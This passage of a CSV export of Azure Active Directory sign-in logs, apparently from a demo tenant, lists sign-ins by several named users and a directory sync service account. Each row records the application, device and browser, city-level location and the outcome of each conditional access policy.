'5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 12:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5949abe0-9b87-40bf-991e-6df705131100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5949abe0-9b87-40bf-991e-6df705131100,SigninLogs,Sucess,50.6406517,5.572050095
+1670,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,14e1ce32-eb0a-4d2f-a0c2-b111e432e19c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",47dc00a1-c484-43d0-a54f-6777a8790f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,47dc00a1-c484-43d0-a54f-6777a8790f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1671,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:51.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85d3469f-600c-0000-54f3-706b4f53c51a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",87802367-3de7-42c2-ada0-d6bc24961700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,87802367-3de7-42c2-ada0-d6bc24961700,SigninLogs,Sucess,41.90428925,-85.99833679
+1672,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0f77775c-2865-47a6-afc9-17aa99b9b62c,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",52a6664f-09a1-41b6-959f-775db35f1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,52a6664f-09a1-41b6-959f-775db35f1600,SigninLogs,Sucess,41.90428925,-85.99833679
+1673,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:51.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",4c26ff63-9053-4f52-8a36-491b20ff0e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4c26ff63-9053-4f52-8a36-491b20ff0e00,SigninLogs,Sucess,51.4458313,-0.969720006
+1674,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:18.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1c3d0787-0844-4ead-9f74-7742956fcf81,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 10:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4aed1172-3ed3-4e97-ac91-0186d3560f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4aed1172-3ed3-4e97-ac91-0186d3560f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1675,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:50.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:02,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",9a5be8ca-381f-49d5-a584-708ba66f5800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9a5be8ca-381f-49d5-a584-708ba66f5800,SigninLogs,Sucess,38.47222137,-77.41989899
+1676,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,46b99922-08c3-4408-a9fa-720d63c63903,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 10:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e5856cfd-3e84-4d67-b30b-c1ce83660f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e5856cfd-3e84-4d67-b30b-c1ce83660f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1677,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,46b99922-08c3-4408-a9fa-720d63c63903,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 